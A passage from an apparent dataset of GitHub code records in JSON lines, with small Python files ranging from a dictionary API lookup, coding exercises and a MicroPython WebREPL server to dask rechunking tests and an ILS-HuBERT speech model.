list\n\ndef get_def(word):\n    try:\n        f=open(\"./dictKey.txt\",\"r\")\n    except FileNotFoundError as e:\n        raise Exception('<file>.txt is not found')\n\n    s=f.read().rstrip(\"\\n\")\n    f.close()\n    url = \"https://dictionaryapi.com/api/v3/references/collegiate/json/\" + word + \"?key=\" + s\n\n    defin = []\n    try:\n        raw = request.urlopen(url)\n        info = json.loads(raw.read())\n        for i in info:\n            defin.append(i['shortdef'])\n\n        #for i in defin:\n        #    print(i)\n        #    print(\"\\n\")\n    except:\n        # request failed or response was not JSON: no definitions available\n        print(\"NO\")\n\n    #print(defin)\n\n    if len(defin) != 0:\n        success = True\n        random_def = random.choice(defin[0])\n    else:\n        success = False\n        random_def = ''\n    #print(random_def)\n\n    return (success, random_def)\n\nword = \"tom\"\nprint(get_def(word))\n","repo_name":"mffoley/pseudowoodo","sub_path":"util/dictAPI.py","file_name":"dictAPI.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37609265306","text":"\"\"\"Write a Python program to find the index of the largest prime in the list and\nthe sum of its digits. 
\nInput: [3, 7, 4]\nOutput:\n[1, 7]\nInput: [3, 11, 7, 17, 19, 4]\nOutput:\n[4, 10]\nInput: [23, 17, 201, 14, 10473, 43225, 421, 423, 11, 10, 2022, 342157]\nOutput:\n[6, 7]\"\"\"\n\n\ndef largest_prime(nums):\n    # walk the candidates from largest to smallest; the first prime found\n    # is the largest prime in the list, and False is returned if there is none\n    for candidate in sorted(nums, reverse=True):\n        if candidate < 2:\n            continue\n        for k in range(2, int(candidate ** 0.5) + 1):\n            if candidate % k == 0:\n                break\n        else:\n            return candidate\n    return False\n\n\ndef test(primes):\n    max_num = largest_prime(primes)\n    if max_num is not False:\n        # a single-digit prime is its own digit sum, so one branch covers all cases\n        cnt_list = list(map(lambda x: int(x), str(max_num)))\n        return [primes.index(max_num), sum(cnt_list)]\n\n\ninput_nums = [3, 11, 7, 17, 19, 4]\nprint(test(input_nums))\n\ninput_nums = [3, 7, 4]\nprint(test(input_nums))\n\ninput_nums = [3, 7, 4, 13, 31]\nprint(test(input_nums))\n","repo_name":"mirshoddev99/Problems-Patterns","sub_path":"Python-100-Exercise/solutions/70-80/76_prob.py","file_name":"76_prob.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30248160941","text":"import gc\nimport json\nimport socket\n\nimport _webrepl\nimport network\nimport uos\nimport websocket\nimport websocket_helper\nfrom emp_utils import rainbow\n\n\nclass WebREPL():\n    _instance = None\n\n    @classmethod\n    def send(cls,json_data):\n        WebREPL().ws.write(json_data)\n\n    def __new__(cls):\n        if not cls._instance:\n            cls._instance = super(WebREPL, cls).__new__(cls)\n            cls._instance.ws = None\n            cls._instance.listen_s = None\n            cls._instance.client_s = None\n            cls._instance.wr = None\n        return cls._instance\n\n    @classmethod\n    def setup_conn(cls,port, accept_handler):\n        WebREPL().listen_s = socket.socket()\n        WebREPL().listen_s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n        ai = socket.getaddrinfo(\"0.0.0.0\", port)\n        addr = ai[0][4]\n\n        WebREPL().listen_s.bind(addr)\n        WebREPL().listen_s.listen(1)\n        if accept_handler:\n            WebREPL().listen_s.setsockopt(socket.SOL_SOCKET, 20, accept_handler)\n        for i in (network.AP_IF, network.STA_IF):\n            iface = network.WLAN(i)\n            if iface.active():\n                print(rainbow(\"WebREPL daemon started on ws://%s:%d\" % (iface.ifconfig()[0], port), color='green'))\n        return WebREPL().listen_s\n\n    @classmethod\n    def accept_conn(cls,listen_sock):\n\n        cl, remote_addr = listen_sock.accept()\n        # check for an existing dupterm client by swapping it out and back\n        prev = uos.dupterm(None)\n        uos.dupterm(prev)\n        if prev:\n            print(\"\\nConcurrent WebREPL connection from\", remote_addr, \"rejected\")\n            cl.close()\n            return\n        print(\"\\nWebREPL connection from:\", remote_addr)\n        WebREPL().client_s = cl\n        websocket_helper.server_handshake(cl)\n        WebREPL().ws = websocket.websocket(cl, True)\n\n        WebREPL().wr = _webrepl._webrepl(WebREPL().ws)\n        cl.setblocking(False)\n        # notify REPL on socket incoming data\n        cl.setsockopt(socket.SOL_SOCKET, 20, uos.dupterm_notify)\n        uos.dupterm(WebREPL().wr)\n\n    @classmethod\n    def stop(cls):\n        uos.dupterm(None)\n        if WebREPL().client_s:\n            WebREPL().client_s.close()\n        if WebREPL().listen_s:\n            WebREPL().listen_s.close()\n\n    @classmethod\n    def start(cls,port=8266, password=None):\n        WebREPL().stop()\n        if password is None:\n            try:\n                import webrepl_cfg\n                _webrepl.password(webrepl_cfg.PASS)\n                WebREPL().setup_conn(port, WebREPL().accept_conn)\n                print(\"Started webrepl in normal mode\")\n            except:\n                print(\"WebREPL is not configured, run 'import webrepl_setup'\")\n        else:\n            _webrepl.password(password)\n            WebREPL().setup_conn(port, WebREPL().accept_conn)\n            print(rainbow(\"WebREPL started.\", 
color='green'))\n\n @classmethod\n def start_foreground(cls,port=8266):\n WebREPL().stop()\n s = WebREPL().setup_conn(port, None)\n WebREPL().accept_conn(s)\n\n\n\ndef emp_sender(func):\n def wrapper(*args, **kwargs): \n rsp = dict(func=func.__name__, data=func(*args, **kwargs))\n WebREPL.send(json.dumps(rsp) + '\\n\\r')\n gc.collect()\n return wrapper\n","repo_name":"1zlab/EMP","sub_path":"emp_webrepl.py","file_name":"emp_webrepl.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"28653052875","text":"'''https://school.programmers.co.kr/learn/courses/30/lessons/12945'''\ndef solution(n):\n a = 0\n b = 1\n if n == 0 :\n answer = 0\n if n == 1 :\n answer = 1\n if n > 1 :\n for x in range(1, n) :\n c = a%1234567 + b%1234567\n answer = c\n a = b\n b = c\n return answer%1234567","repo_name":"mychu-lab/algorithm-study","sub_path":"programmers/lv2_피보나치수.py","file_name":"lv2_피보나치수.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32488879827","text":"import utils\nimport csv\nimport os\nimport CalculationFunctions as clf\nimport InOutFunctions as iof\n\nsamples, settings = utils.loadSettings()\ntxt2 = open(\"fail.txt\", \"a\")\nfor s in samples:\n G_primitive, S_bounds, primitive_only, ConstraintType, constraint, loop_free, _, out_path, _, timestep, \\\n bio_flag, height, DAG, height2, attempt_range, ub = utils.loadData(s, settings)\n file = open(f\"RunTime.csv\", \"a\", newline=\"\")\n writer = csv.writer(file)\n if file.tell() == 0:\n writer.writerow([\"Benchmark\", \"AttemptRange\", \"RunTime\"])\n path = f\"{out_path}/sol_after_merge_{S_bounds[1]}_{constraint[0]}_{attempt_range}.txt\"\n if not os.path.isfile(path):\n txt2.write(f\"{s},\")\n continue\n with open(path) as f:\n for line in f:\n if \"Time\" in line:\n line = line.split(\":\")[1]\n line = line.replace(\" \", \"\")\n line = line.replace(\"s\", \"\")\n line = line.replace(\"\\n\", \"\")\n writer.writerow([s, attempt_range, line])\n\n\n\n # li = [4]\n # for i in li:\n # MergeResult, TotalComm = iof.loadSolution(f\"{out_path}/sol_after_merge_{S_bounds[1]}_{constraint[0]}_{attempt_range}_{i}.txt\")\n # CellToCellEdges = clf.calculateCellEdges(G_primitive, MergeResult)\n # print(i, TotalComm, CellToCellEdges)\n\n\n\n","repo_name":"zyrrron/Oriole_old","sub_path":"algorithm/calculateResultInfo.py","file_name":"calculateResultInfo.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27741465738","text":"import logging\nfrom celery import shared_task\nfrom celery.utils.log import get_logger\nfrom app import crud\nfrom app.db.session import SessionLocal\nfrom app.schemas.article import ArticleUpdate\nimport pickle\nimport torch\nfrom transformers import BertForSequenceClassification, BertTokenizer\nfrom app.tasks.BERT_1_1 import convert_examples_to_inputs, get_data_loader\n\nMODEL_FP = r\"/model_resources/BERT_1_1.bin\"\n\nclass BERT_infer(object):\n def __init__(self, model_fp, batch_size=10):\n self.BERT_MODEL = \"bert-base-uncased\"\n self.label2idx = {False: 0, True: 1}\n self.model_fp = model_fp\n self.model_state_dict = torch.load(\n self.model_fp, map_location=lambda storage, loc: storage\n )\n self.model = BertForSequenceClassification.from_pretrained(\n self.BERT_MODEL, state_dict=self.model_state_dict, num_labels=2\n )\n 
self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.max_seq_length = 500\n self.model.to(self.device)\n self.tokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", model_max_length=self.max_seq_length, truncation_side='right')\n # self.tokenizer.model_max_length = 500\n self.batch_size = batch_size\n\n def score(self, txt):\n input_ids = (\n torch.tensor(self.tokenizer.encode(txt, max_length=self.max_seq_length)).unsqueeze(0).to(self.device)\n ) # batch size 1\n output = self.model(input_ids)\n score = round(output.logits.softmax(dim=-1).tolist()[0][1] * 100, 5)\n return score\n\nbert_infer = BERT_infer(model_fp=MODEL_FP)\n\n\n\n@shared_task(\n name=\"infer:job_score\",\n bind=True,\n default_retry_delay=30,\n max_retries=3,\n soft_time_limit=10000,\n)\ndef job_ct_score(self, job_id):\n db = SessionLocal()\n job = crud.job.get(db=db, id=job_id)\n\n for article in job.article_set:\n if article.text:\n score = bert_infer.score(article.text)\n article_update = ArticleUpdate(score=score)\n crud.article.update(db=db, db_obj=article, obj_in=article_update)\n\n db.close()\n return job_id\n","repo_name":"bitem-heg-geneve/CellTriage-api","sub_path":"backend/app/app/tasks/ct_score.py","file_name":"ct_score.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6280791001","text":"class Solution:\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n # ans list\n ans = []\n\n for num in range(1,n+1):\n\n divisible_by_3 = (num % 3 == 0)\n divisible_by_5 = (num % 5 == 0)\n\n num_ans_str = \"\"\n\n if divisible_by_3:\n # Divides by 3\n num_ans_str += \"Fizz\"\n if divisible_by_5:\n # Divides by 5\n num_ans_str += \"Buzz\"\n if not num_ans_str:\n # Not divisible by 3 or 5\n num_ans_str = str(num)\n\n # Append the current answer str to the ans list\n ans.append(num_ans_str)\n\n return ans","repo_name":"DivyaGodayal/CoderChef-Kitchen","sub_path":"Adhoc/Fizz-Buzz/solution_string_concat.py","file_name":"solution_string_concat.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"54"} +{"seq_id":"27048446295","text":"import random\r\n\r\nmise = -1\r\nnumero = -1\r\nroulette = range(49)\r\nresult = random.randint(0, 49)\r\n\r\nwhile int(mise) < 0 :\r\n mise = input(\"Veuillez saisir une somme à miser : \")\r\nwhile int(numero) < 0 or int(numero) > 49 :\r\n numero = input(\"Veuillez saisir une valeur enter 0 et 49 : \")\r\n\r\nprint(f\"Vous avez misé {mise} euros sur le {numero}\" )\r\nprint(f\"Le numéro gagnant est : {result}\")\r\n\r\nnumero = int(numero)\r\nmise = int(mise)\r\n\r\nif numero == result :\r\n gain = mise*3\r\n print(f\"Vous avez gagné {gain} euros !!\")\r\nelif (numero % 2) == 0 and (result % 2) == 0 :\r\n gain = mise/2\r\n print(f\"Vous avez gagné {gain} euros !!\")\r\nelif (numero % 2) != 0 and (result % 2) != 0 :\r\n gain = mise/2\r\n print(f\"Vous avez gagné {gain} euros !!\")\r\nelse :\r\n print(\"Vous avez perdu voter mise !\")\r\n","repo_name":"SylvainDecombe/python","sub_path":"bonus01.py","file_name":"bonus01.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74796947040","text":"import matplotlib.pyplot as plt\nimport random\n\ny=[random.randint(20,80) for i in 
range(20)]\nx=range(1,21)\nplt.figure(figsize=(15,6),dpi=80)\n\n\n#plt.bar(range(len(x)),y,width=0.8)\nplt.barh(range(len(x)),y,height=0.5,color='orange')\n#plt.xticks(range(len(x)),x)\nplt.yticks(range(len(x)),x)\nplt.grid(alpha=0.5)\nplt.show()","repo_name":"xuefliang/Python-learn","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43067366759","text":"from itertools import chain\n\nimport dask.array as da\nimport numpy as np\nimport pytest\nfrom dask import delayed\n\nfrom pymcac.tools.core.dask_tools import aligned_rechunk, not_aligned_rechunk\nfrom pymcac.tools.core.sorting import sortby\n\nfrom .generator import generate_dummy_aggregates_data\nfrom .test_data import check_dask_consistency, check_data\n\n\ndef identical(ds1, ds2):\n \"\"\"Check identity of values and chunks.\"\"\"\n if not ds1.identical(ds2):\n return False\n if not ds1.chunks == ds2.chunks:\n return False\n return True\n\n\ndef check_chunks(chunks, target):\n \"\"\"Check if correctly chunks.\"\"\"\n assert max(chunks) == target\n assert min(chunks) > 0\n assert target in chunks\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\ndef test_not_aligned_rechunk_no_change(dask):\n \"\"\"Check not_aligned_rechunk with same chunks.\"\"\"\n data = generate_dummy_aggregates_data(dask=dask)\n\n no_change = not_aligned_rechunk(data, chunks=data.chunks)\n assert identical(data, no_change)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\n@pytest.mark.parametrize(\"dim\", [\"k\", \"Time\", \"Label\"])\ndef test_not_aligned_rechunk_one_chunk(dask, dim):\n \"\"\"Check not_aligned_rechunk with one chunks.\"\"\"\n data = generate_dummy_aggregates_data(dask=dask)\n\n one_chunked = not_aligned_rechunk(data, chunks={dim: 3})\n\n assert identical(data.compute(), one_chunked.compute())\n assert identical(one_chunked, one_chunked.unify_chunks())\n assert set(one_chunked.chunks) == {dim} | set(data.chunks)\n check_chunks(one_chunked.chunks[dim], 3)\n check_data(one_chunked, aligned=False)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\n@pytest.mark.parametrize(\"dims\", [(\"k\", \"Time\"), (\"Time\", \"Label\")])\ndef test_not_aligned_rechunk_two_chunk(dask, dims):\n \"\"\"Check not_aligned_rechunk with two chunks in one call.\"\"\"\n data = generate_dummy_aggregates_data(nt=5, dask=dask)\n\n chunks = dict(zip(dims, (3, 4)))\n two_chunked = not_aligned_rechunk(data, chunks=chunks)\n\n assert identical(data.compute(), two_chunked.compute())\n assert identical(two_chunked, two_chunked.unify_chunks())\n assert set(two_chunked.chunks) == set(dims) | set(data.chunks)\n for dim, n in chunks.items():\n check_chunks(two_chunked.chunks[dim], n)\n check_data(two_chunked, aligned=False)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\n@pytest.mark.parametrize(\"dims\", [(\"k\", \"Time\"), (\"Time\", \"Label\")])\ndef test_not_aligned_rechunk_two_chunk_seq(dask, dims):\n \"\"\"Check not_aligned_rechunk with two chunks in two calls.\"\"\"\n data = generate_dummy_aggregates_data(nt=5, dask=dask)\n\n chunks = dict(zip(dims, (3, 4)))\n two_chunked = not_aligned_rechunk(data, chunks=chunks)\n chunk0, chunk1 = ({dim: n} for dim, n in chunks.items())\n two_chunked_seq = not_aligned_rechunk(not_aligned_rechunk(data, chunks=chunk0), chunks=chunk1)\n assert identical(two_chunked, two_chunked_seq)\n two_chunked_seq = not_aligned_rechunk(not_aligned_rechunk(data, chunks=chunk1), chunks=chunk0)\n assert 
identical(two_chunked, two_chunked_seq)\n check_data(two_chunked_seq, aligned=False)\n\n\ndef test_not_aligned_rechunk_multi():\n \"\"\"Check not_aligned_rechunk with multiple chunks.\"\"\"\n data = generate_dummy_aggregates_data(nt=5)\n\n multi_chunk = data.copy()\n for i, var in enumerate(chain(multi_chunk.values(), multi_chunk.coords.values())):\n if i == 0:\n continue\n if \"k\" in var.dims:\n var.data = da.from_array(var.data, chunks=i + 1)\n assert identical(data, multi_chunk.compute())\n\n rechunked = not_aligned_rechunk(multi_chunk, k=3)\n\n assert identical(data, rechunked.compute())\n assert set(rechunked.chunks) == {\"k\"}\n check_chunks(rechunked.chunks[\"k\"], 3)\n assert identical(rechunked, rechunked.unify_chunks())\n check_data(rechunked, aligned=False)\n\n\ndef test_not_aligned_rechunk_no_compute():\n \"\"\"Check not_aligned_rechunk is lazy.\"\"\"\n data = generate_dummy_aggregates_data()\n\n data[\"trigger\"] = (\"k\",), da.from_delayed(\n raise_if_computed(), dtype=int, shape=(data.sizes[\"k\"],)\n )\n not_aligned_rechunk(data, chunks={\"k\": 3})\n\n\n@pytest.mark.parametrize(\"dask\", [1, 2])\ndef test_aligned_rechunk_idempotent(dask):\n \"\"\"Check aligned_rechunk with already aligned chunks.\"\"\"\n data = generate_dummy_aggregates_data(sort_info=True, dask=dask)\n rechunked = aligned_rechunk(data, Time=max(data.chunks[\"Time\"]))\n assert identical(data, rechunked)\n check_data(rechunked)\n\n\n@pytest.mark.parametrize(\"dask\", [1, 2])\ndef test_aligned_rechunk_infer_on(dask):\n \"\"\"Check aligned_rechunk `on` inference`.\"\"\"\n data = generate_dummy_aggregates_data(sort_info=True, dask=dask)\n rechunked = aligned_rechunk(data)\n assert identical(data, rechunked)\n check_data(rechunked)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 5])\ndef test_aligned_rechunk_time(dask):\n \"\"\"Check aligned_rechunk on time.\"\"\"\n data_unchunked = generate_dummy_aggregates_data(sort_info=True, dask=dask)\n data_chunked = aligned_rechunk(data_unchunked, Time=2)\n assert identical(data_unchunked.compute(), data_chunked.compute())\n assert set(data_chunked.chunks) == {\"k\", \"Time\"}\n check_chunks(data_chunked.chunks[\"Time\"], 2)\n check_data(data_chunked)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 5])\ndef test_aligned_rechunk_label(dask):\n \"\"\"Check aligned_rechunk on label.\"\"\"\n data_unchunked = sortby(generate_dummy_aggregates_data(dask=dask), \"Label\")\n check_data(data_unchunked)\n data_chunked = aligned_rechunk(data_unchunked, Label=2)\n assert identical(data_unchunked.compute(), data_chunked.compute())\n assert set(data_chunked.chunks) == {\"k\", \"Label\"}\n check_chunks(data_chunked.chunks[\"Label\"], 2)\n check_data(data_chunked)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 5])\ndef test_aligned_rechunk_other(dask):\n \"\"\"Check aligned_rechunk on random data.\"\"\"\n aggregates = generate_dummy_aggregates_data(dask=dask)\n if dask:\n chunks = aggregates.chunks\n aggregates[\"Np\"] = (\"k\",), np.random.randint(1, 10, aggregates.sizes[\"k\"])\n if dask:\n aggregates = not_aligned_rechunk(aggregates, chunks=chunks)\n\n data_unchunked = sortby(aggregates, \"Np\")\n\n data_chunked = aligned_rechunk(data_unchunked, Np=2)\n\n assert identical(data_unchunked.compute(), data_chunked.compute())\n assert set(data_chunked.chunks) == {\"k\"}\n\n limits_inf = da.map_blocks(\n lambda Np: np.array([Np.min()]), data_chunked[\"Np\"].data, dtype=int\n ).compute()\n limits_sup = da.map_blocks(\n lambda Np: np.array([Np.max()]), data_chunked[\"Np\"].data, dtype=int\n 
).compute()\n assert np.all(limits_inf[1:] > limits_inf[:-1])\n assert np.all(limits_sup[1:] > limits_sup[:-1])\n assert np.all(limits_sup >= limits_inf)\n\n check_data(data_chunked)\n\n\ndef test_aligned_rechunk_args():\n \"\"\"Check aligned_rechunk args parsing.\"\"\"\n data_unchunked = generate_dummy_aggregates_data()\n data_chunked = aligned_rechunk(data_unchunked, Time=2)\n data_chunked2 = aligned_rechunk(data_unchunked, \"Time\", Time=2)\n assert identical(data_chunked, data_chunked2)\n\n data_chunked2 = aligned_rechunk(data_unchunked, Time=data_chunked.chunks[\"Time\"])\n assert identical(data_chunked, data_chunked2)\n\n data_chunked2 = aligned_rechunk(not_aligned_rechunk(data_unchunked, Time=2), Time=None)\n assert identical(data_chunked, data_chunked2)\n\n\ndef test_aligned_rechunk_mixed():\n \"\"\"test_aligned_rechunk_mixed.\"\"\"\n data_unchunked = generate_dummy_aggregates_data()\n\n k_chunked = aligned_rechunk(data_unchunked, \"Time\", k=3)\n check_dask_consistency(k_chunked)\n\n mixed = not_aligned_rechunk(data_unchunked, k=k_chunked.chunks[\"k\"])\n k_chunked2 = aligned_rechunk(mixed, \"Time\", k=None)\n assert identical(k_chunked2, k_chunked)\n\n\ndef test_aligned_rechunk_no_compute():\n \"\"\"Check aligned_rechunk lazy.\"\"\"\n data = generate_dummy_aggregates_data()\n\n data[\"trigger\"] = (\"k\",), da.from_delayed(\n raise_if_computed(), dtype=int, shape=(data.sizes[\"k\"],)\n )\n aligned_rechunk(data, Time=2)\n\n\n@delayed\ndef raise_if_computed():\n \"\"\"Raise if called.\"\"\"\n raise ValueError(\"I should never be computed\")\n","repo_name":"giraldeau/MCAC","sub_path":"pymcac/tests/test_dask.py","file_name":"test_dask.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37882512751","text":"import logging\nfrom typing import Dict, List, Optional, Tuple\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom dataclasses import dataclass, field\nfrom fairseq import utils\nfrom fairseq.data.dictionary import Dictionary\nfrom fairseq.models import BaseFairseqModel, register_model\nfrom fairseq.models.hubert import HubertConfig, HubertModel\nfrom fairseq.modules import GradMultiply, LayerNorm\nfrom fairseq.tasks.hubert_pretraining import (\n HubertPretrainingConfig,\n HubertPretrainingTask,\n)\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass ILSHubertConfig(HubertConfig):\n #relative position embedding\n relative_position_embedding: bool = field(\n default=False,\n metadata={\"help\": \"whether to use the relative position embedding, (bucket relpos embedding by default)\"}\n )\n num_buckets: int = field(\n default=320,\n metadata={\"help\": \"the number of buckets for relative position embedding\"}\n )\n max_distance: int = field(\n default=800,\n metadata={\"help\": \"the maximum distance for computing relative bias, beyond which will assign the same embedding\"}\n )\n\n # ILS-SSL params\n weighted_sum: bool = field(\n default=False\n )\n predict_layers: str = field(\n default=\"[12]\"\n )\n separate_label_embeds: bool = field(\n default=False\n )\n separate_layer_targets: bool = field(\n default=False\n )\n\n\n@register_model(\"ils_hubert\", dataclass=ILSHubertConfig)\nclass ILSHubertModel(HubertModel):\n def __init__(\n self,\n cfg: ILSHubertConfig,\n task_cfg: HubertPretrainingConfig,\n dictionaries: List[Dictionary],\n ) -> None:\n super().__init__(cfg, task_cfg, dictionaries)\n logger.info(f\"HubertModel Config: {cfg}\")\n\n 
self.predict_layers = eval(cfg.predict_layers)\n self.separate_label_embeds = cfg.separate_label_embeds\n self.separate_layer_targets = cfg.separate_layer_targets\n self.weighted_sum = cfg.weighted_sum\n\n self.layer_norm_first = cfg.layer_norm_first\n if self.layer_norm_first:\n self.post_layer_norm = torch.nn.Sequential(*[LayerNorm(cfg.encoder_embed_dim) for _ in range(len(self.predict_layers))])\n\n if self.separate_label_embeds:\n if self.separate_layer_targets or not self.untie_final_proj:\n self.final_proj = torch.nn.Sequential(*[nn.Linear(\n cfg.encoder_embed_dim, cfg.final_dim)\n for _ in range(len(self.predict_layers))])\n else:\n self.final_proj = torch.nn.Sequential(*[nn.Linear(\n cfg.encoder_embed_dim, cfg.final_dim * len(dictionaries))\n for _ in range(len(self.predict_layers))])\n else:\n if self.separate_layer_targets or not self.untie_final_proj:\n self.final_proj = nn.Linear(cfg.encoder_embed_dim, cfg.final_dim)\n else:\n self.final_proj = nn.Linear(cfg.encoder_embed_dim, cfg.final_dim * len(dictionaries))\n\n if self.weighted_sum:\n self.weights = nn.Parameter(torch.zeros(len(self.predict_layers)))\n # modules below are not needed during fine-tuning\n if any([d is None for d in dictionaries]):\n logger.info(\n \"cannot find dictionary. assume will be used for fine-tuning\"\n )\n else:\n self.num_classes = [len(d) for d in dictionaries]\n layer_dim = len(self.predict_layers) if self.separate_layer_targets or self.separate_label_embeds else 1\n embed_dim = sum(self.num_classes) if not self.separate_layer_targets else max(self.num_classes)\n self.label_embs_concat = nn.Parameter(\n torch.FloatTensor(layer_dim, embed_dim, cfg.final_dim)\n )\n nn.init.uniform_(self.label_embs_concat)\n\n @classmethod\n def build_model(cls, cfg: ILSHubertConfig, task: HubertPretrainingTask):\n \"\"\"Build a new model instance.\"\"\"\n\n model = ILSHubertModel(cfg, task.cfg, task.dictionaries)\n return model\n\n def forward(\n self,\n source: torch.Tensor,\n target_list: Optional[List[torch.Tensor]] = None,\n padding_mask: Optional[torch.Tensor] = None,\n mask: bool = True,\n features_only: bool = False,\n output_layer: Optional[int] = None,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"output layer is 1-based\"\"\"\n if self.feature_grad_mult > 0:\n features = self.feature_extractor(source)\n if self.feature_grad_mult != 1.0:\n features = GradMultiply.apply(features, self.feature_grad_mult)\n else:\n with torch.no_grad():\n features = self.feature_extractor(source)\n if target_list is not None:\n features, target_list = self.forward_targets(features, target_list)\n\n features_pen = features.float().pow(2).mean()\n\n features = features.transpose(1, 2)\n features = self.layer_norm(features)\n unmasked_features = features.clone()\n\n if padding_mask is not None:\n padding_mask = self.forward_padding_mask(features, padding_mask)\n\n\n if self.post_extract_proj is not None:\n features = self.post_extract_proj(features)\n\n\n features = self.dropout_input(features)\n unmasked_features = self.dropout_features(unmasked_features)\n\n if mask:\n x, mask_indices = self.apply_mask(\n features, padding_mask, target_list\n )\n else:\n x = features\n mask_indices = None\n\n # feature: (B, T, D), float\n # target: (B, T), long\n # x: (B, T, D), float\n # padding_mask: (B, T), bool\n # mask_indices: (B, T), bool\n\n x, layer_results = self.encoder(\n x,\n padding_mask=padding_mask,\n layer=self.predict_layers\n )\n\n result = {\"x\": x, \"padding_mask\": padding_mask, \"features\": features, \"layer_results\": 
layer_results}\n\n if features_only:\n if self.layer_norm_first and output_layer is not None:\n result['x'] = self.post_layer_norm[-1](x)\n return result\n\n layer_results = [layer_x.transpose(0, 1) for i, (layer_x, _) in enumerate(layer_results)]\n\n if not (x == layer_results[-1]).all():\n print(\"{} {} {} {}\".format((x == layer_results[-1]).shape, (x == layer_results[-1]).float().sum(),\n (x - layer_results[-1]).float().sum(), (x - layer_results[-1]).float().abs().max(),))\n\n if self.layer_norm_first:\n layer_results = [layernorm(x) for x, layernorm in zip(layer_results, self.post_layer_norm)]\n\n def compute_pred(proj_x, target, label_embs):\n # compute logits for the i-th label set\n y = torch.index_select(label_embs, 0, target.long())\n negs = label_embs.unsqueeze(1).expand(-1, proj_x.size(0), -1)\n if self.target_glu:\n y = self.target_glu(y)\n negs = self.target_glu(negs)\n # proj_x: (S, D)\n # y: (S, D)\n # negs: (Neg, S, D)\n return self.compute_nce(proj_x, y, negs)\n\n\n logit_m_list = []\n logit_u_list = []\n proj_x_m_list = []\n proj_x_u_list = []\n\n if self.separate_layer_targets:\n assert len(layer_results) == len(self.final_proj)\n assert len(layer_results) == len(self.label_embs_concat)\n\n for i, layer_x in enumerate(layer_results): #, final_proj, label_embs in zip(layer_results, self.final_proj, label_embs_concat):\n if self.separate_label_embeds:\n final_proj = self.final_proj[i]\n else:\n final_proj = self.final_proj\n\n if self.separate_label_embeds or self.separate_layer_targets:\n label_embs = self.label_embs_concat[i]\n else:\n label_embs = self.label_embs_concat[0]\n\n if not self.separate_layer_targets:\n label_embs_list = label_embs.split(self.num_classes, 0)\n else:\n label_embs_list = [label_embs[:self.num_classes[i]]]\n\n if not self.skip_masked:\n masked_indices = torch.logical_and(~padding_mask, mask_indices)\n proj_x_m = final_proj(layer_x[masked_indices])\n\n if self.separate_layer_targets:\n proj_x_m_list = [proj_x_m]\n logit_m_list += [\n compute_pred(proj_x_m, target_list[i][masked_indices], label_embs_list[0])\n ]\n else:\n if self.untie_final_proj:\n proj_x_m_list = proj_x_m.chunk(len(target_list), dim=-1)\n else:\n proj_x_m_list = [proj_x_m for _ in range(len(target_list))]\n logit_m_list += [\n compute_pred(proj_x_m, t[masked_indices], label_embs_list[i])\n for i, (proj_x_m, t) in enumerate(\n zip(proj_x_m_list, target_list)\n )\n ]\n else:\n logit_m_list += [None for _ in target_list]\n\n if not self.skip_nomask:\n nomask_indices = torch.logical_and(~padding_mask, ~mask_indices)\n proj_x_u = final_proj(layer_x[nomask_indices])\n if self.separate_layer_targets:\n proj_x_u_list = [proj_x_u]\n logit_u_list += [\n compute_pred(proj_x_u, target_list[i][nomask_indices], label_embs_list[0])\n ]\n else:\n if self.untie_final_proj:\n proj_x_u_list = proj_x_u.chunk(len(target_list), dim=-1)\n else:\n proj_x_u_list = [proj_x_u for _ in range(len(target_list))]\n logit_u_list += [\n compute_pred(proj_x_u, t[nomask_indices], label_embs_list[i])\n for i, (proj_x_u, t) in enumerate(\n zip(proj_x_u_list, target_list)\n )\n ]\n else:\n logit_u_list += [None for _ in target_list]\n\n result[\"logit_m_list\"] = logit_m_list\n result[\"logit_u_list\"] = logit_u_list\n result[\"padding_mask\"] = padding_mask\n result[\"features_pen\"] = features_pen\n return result\n\n def extract_features(\n self,\n source: torch.Tensor,\n padding_mask: Optional[torch.Tensor] = None,\n mask: bool = False,\n ret_conv: bool = False,\n output_layer: Optional[int] = None,\n 
